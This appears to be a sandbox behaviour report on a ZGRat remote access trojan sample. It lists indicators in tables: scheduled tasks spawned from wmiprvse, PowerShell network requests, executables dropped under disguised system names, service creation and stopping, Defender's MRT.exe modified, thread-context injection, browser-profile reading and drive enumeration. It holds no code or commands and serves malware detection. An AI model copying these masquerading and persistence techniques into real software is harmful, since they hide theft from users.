Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

ZGRat

rat zgrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\conhostsft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\Windows\en-US\conhost.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\VC_redist.x64.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2500 set thread context of 2368 N/A C:\ProgramData\VC_redist.x64.exe C:\Windows\system32\conhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\DESIGNER\csrss.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File opened for modification C:\Program Files\Common Files\DESIGNER\csrss.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Common Files\DESIGNER\886983d96e3d3e C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files (x86)\Common Files\SearchApp.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files (x86)\Common Files\38384e6a620884 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\e1ef82546f0b02 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\en-US\088424020bedd6 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File created C:\Windows\ja-JP\fontdrvhost.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Windows\ja-JP\5b884080fd4f94 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Windows\en-US\conhost.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LocationInformation C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGUID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ContainerID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
